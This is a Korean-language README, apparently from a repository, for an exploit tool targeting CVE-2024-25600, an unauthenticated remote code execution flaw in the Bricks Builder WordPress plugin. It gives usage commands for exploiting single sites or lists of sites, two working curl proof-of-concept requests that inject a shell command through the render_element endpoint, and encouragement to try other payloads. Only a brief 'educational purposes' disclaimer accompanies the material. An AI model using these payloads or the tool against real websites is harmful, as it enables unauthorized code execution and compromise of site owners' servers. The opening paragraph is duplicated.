
이 도구는 WordPress용 Bricks Builder 플러그인에서 발견된 CVE-2024-25600 취약점을 악용하도록 설계되었습니다. 이 취약점은 영향을 받는 웹사이트에서 인증되지 않은 원격 코드 실행을 허용합니다. 이 도구는 nonce를 검색하고 특수하게 제작된 요청을 전송하여 임의의 명령을 실행함으로써 악용 프로세스를 자동화합니다.
이 도구 🛠️는 WordPress용 Bricks Builder 플러그인에서 발견된 CVE-2024-25600 취약점 🕳️을 악용하도록 설계되었습니다. 이 취약점은 영향을 받는 웹사이트 💻에서 인증되지 않은 원격 코드 실행을 허용합니다. 이 도구는 nonce를 검색하고 특수하게 조작된 요청을 보내 임의의 명령을 실행함으로써 악용 프로세스를 자동화합니다.
git clone을 사용하여 이 저장소를 로컬 머신 🖥️에 복제합니다.pip install -r requirements.txt를 사용하여 필요한 Python 라이브러리를 설치합니다.python exploit.py -u <URL>로 도구를 실행하여 대화형 모드를 시작합니다.python exploit.py -l <file_path>로 도구를 실행하여 나열된 사이트를 스캔하고 악용합니다.공개 내용에서 제공된 기본 PoC는 다음과 같습니다:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
업데이트: 두 번째 PoC(더 안정적)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
추가 페이로드가 더 나은 결과를 낼 가능성이 있습니다. 제 익스플로잇이나 개념 증명이 효과가 없다면, 더 효과적인 해결책을 찾기 위해 대체 페이로드를 실험해 보시기 바랍니다.
[HOST]를 대상 웹사이트로, [NONCE]를 사이트에서 검색한 nonce 값으로 바꾸십시오.
CVE-2024-25600 취약점에 대한 자세한 내용은 Snicco.io의 상세 공개 내용을 참조하십시오.
이 README에 제공된 정보는 교육 목적으로만 제공됩니다. 웹사이트나 네트워크에 대한 무단 해킹은 불법이며 비윤리적입니다. 🚫
이 취약점을 발견하고 보고하여 커뮤니티에 웹 애플리케이션을 보호하는 데 도움이 되는 정보와 도구를 제공한 보안 연구원들에게 감사를 표합니다.